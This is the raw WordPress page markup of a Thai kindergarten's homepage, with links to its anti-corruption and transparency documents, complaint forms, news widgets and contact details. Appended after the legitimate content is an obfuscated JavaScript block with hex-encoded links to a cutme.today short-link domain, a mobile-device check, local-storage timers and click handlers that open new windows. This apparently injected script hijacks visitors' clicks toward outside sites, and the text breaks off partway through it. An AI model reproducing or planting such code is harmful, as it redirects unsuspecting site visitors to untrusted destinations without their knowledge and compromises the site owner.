data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 